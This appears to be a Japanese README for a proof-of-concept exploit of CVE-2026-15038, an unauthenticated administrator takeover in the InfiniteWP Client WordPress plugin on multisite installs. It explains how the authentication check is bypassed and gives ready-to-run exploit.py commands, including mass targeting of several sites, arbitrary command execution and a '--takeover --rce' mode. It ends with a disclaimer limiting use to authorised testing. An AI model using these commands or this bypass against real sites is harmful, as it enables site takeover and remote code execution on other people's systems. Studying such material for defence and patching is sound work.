
POC 4 CVE-2026-15038
WordPress マルチサイトにおける未認証の管理者アカウント乗っ取り
WordPress 用プラグイン InfiniteWP Client(< 1.13.6)には、マルチサイト環境 に影響を与える重大な認証バイパス脆弱性が存在します。
未認証の攻撃者は以下のことが可能です:
if (!$iwp_mmb_core->get_option('iwp_client_action_message_id')
&& !$iwp_mmb_core->get_option('iwp_client_public_key'))
get_site_option() を使用 → ネットワークレベル(wp_sitemeta)から読み取りupdate_blog_option() を使用 → ブログごと(wp_X_options)に書き込み💥 結果:マルチサイトでは、ガードは常に false を返します — 再ペアリングが常に許可されます。
if(trim($activation_key) != get_option('iwp_client_activate_key')){
get_option() は false を返すactivation_key を送信しない → trim(null) → '''' != false → false → チェックを通過 🎯openssl_verify() が成功graph LR
A[Send POST Request] --> B[Add Site Action]
B --> C[Guard Bypassed]
C --> D[Activation Key Check Fails]
D --> E[Signature Verifies]
E --> F[Attacker Key Bound]
F --> G[Full Admin Access]
G --> H[RCE Achieved]
# Clone the repository
git clone https://github.com/yourusername/CVE-2026-15038.git
cd CVE-2026-15038
# Install dependencies
pip install -r requirements.txt
python3 exploit.py -t https://wordpress.ddev.site
python3 exploit.py -t https://target1.com -t https://target2.com -t https://target3.com
python3 exploit.py -t https://wordpress.ddev.site --command "wp plugin install hello-dolly --activate"
python3 exploit.py -t https://wordpress.ddev.site --takeover --rce
| File | Description |
|---|---|
exploit.py | 🐍 大量悪用をサポートするメインのエクスプロイトスクリプト |
requirements.txt | 📦 Python 依存関係 |
README.md | 📖 このドキュメント |
add_site リクエストを確認このツールは教育およびセキュリティテスト目的のみです。所有しているシステム、またはテストする明示的な許可を得たシステムでのみ使用してください。作者は誤用に対する責任を負いません。